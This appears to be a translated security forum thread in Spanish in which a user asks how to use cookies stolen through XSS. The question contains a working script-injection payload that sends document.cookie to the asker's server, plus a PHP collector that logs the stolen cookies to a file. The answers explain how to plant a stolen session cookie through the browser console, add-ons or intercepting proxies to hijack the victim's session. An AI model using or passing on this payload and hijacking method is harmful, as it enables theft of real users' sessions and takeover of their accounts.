Usar cookies una vez robadas

Navega tus respuestas
5

He visto muchas publicaciones sobre el robo de cookies, de hecho, he aprovechado la vulnerabilidad XSS para enviar la cookie a mi php a través de una variable en la url a un php, y ese php escribe la cookie en un expediente. (Creo que es uno de los procesos normales).

Te diré cómo hacerlo más claro:
Lo que escribo en el formulario: 

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

Mi php: 

$cookie = $_GET['cookie'];

//open the file and choose the mode
$fh = fopen("users", "a");
fwrite($fh, $cookie);

//close the file
fclose($fh);

print "User Submitted: ";
print ($cookie);

Todo está bien hasta ahora, pero ahora, en la computadora tengo la cookie, ¿cómo puedo acceder al sitio web?

Si pudiera saber cómo puedo aprovechar las ventajas de conocer las cookies, le agradecería.

    
pregunta aDoN 21.10.2014 - 09:45
fuente

4 respuestas

5

AFAIK, el uso de cookies robadas depende del navegador que esté usando.
Por ejemplo, Firefox almacena las cookies en un archivo de texto no simple cookies.sqlite en el que no puede simplemente copiar / pasar la clave / valor de la cookie. Firebug le ofrece la posibilidad de agregar / editar cookies para el sitio web específico.

    
respondido por el elsadek 21.10.2014 - 10:54
fuente
7
  

... php escribe la cookie en un archivo. (Creo que esa es una de las   procesos normales).

Por lo que escribiste anteriormente, parece que podría haber algún error con tu comprensión sobre cómo se crea y mantiene una sesión en un sitio web. Cuando un usuario inicia sesión en un sitio web, se genera un ID de sesión y este ID se almacena en una cookie especial, conocida como cookie de sesión, en el navegador del cliente, como esto: 

PHPSESSID:fgws4j52jcm10dkgw02nd2

Al mismo tiempo, se crea un archivo de sesión (o fila de base de datos) con la misma identificación que contiene variables (como el nombre de usuario, el tiempo de inicio de sesión) relacionadas con ese usuario en particular. Estas variables de sesión se almacenan en el lado del servidor y se invocan desde la matriz superglobal $_SESSION cuando se inicia una sesión.

Para secuestrar una sesión, lo que necesita es una cookie que contenga el par nombre-valor como el anterior. Una condición previa es que la víctima debe iniciar sesión durante el ataque, de modo que el archivo de sesión con el id. Robado todavía esté actualizado en el servidor. Además, el sitio web no debe realizar otras comprobaciones extrañas (como el agente de usuario o la dirección IP) para impedir a los piratas informáticos. 

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

El javascript que escribió anteriormente simplemente inyecta un par nombre-valor en la matriz superglobal $_GET . Lo que desea es transmitir el par nombre-valor utilizando la cookie de su navegador, ciertamente no con la URL.

La mayoría de los navegadores modernos almacenan la información de las cookies en una base de datos como sqlite. Para editar una cookie, debe acceder a la consola web o a la barra de herramientas del desarrollador que está cubierta aquí para Chrome y aquí está en Firefox .

    
respondido por el Question Overflow 21.10.2014 - 12:51
fuente
4

Puede usar JavaScript para configurar la cookie en su navegador: 

document.cookie =
 'cookie1=test; expires=Fri, 3 Aug 2022 20:47:11 UTC; path=/'

Solo necesita abrir una consola presionando F12 o colocar el JavaScript en una página web.

Consulte enlace

    
respondido por el PiTheNumber 21.10.2014 - 12:43
fuente
1

Hay diferentes maneras de hacerlo realmente, todas reduciéndose a lo mismo:

  • Por lo general, su navegador debería permitirle modificar el valor de la cookie almacenada, simplemente reemplace el valor actual por el que ha robado
  • Hay numerosos complementos de navegador & complementos que le permiten manipular su solicitud antes de enviarla, puede agregar o modificar su valor de cookie allí
  • Puede implementar un proxy local como Fiddler o Burp para hacer básicamente lo mismo & alterar su solicitud antes de enviarla
respondido por el Dillinur 21.10.2014 - 11:23
fuente

Lea otras preguntas en las etiquetas

Votos anónimos Las pruebas de penetración informaron vulnerabilidades CERO. ¿Significa esto que mi aplicación web es segura?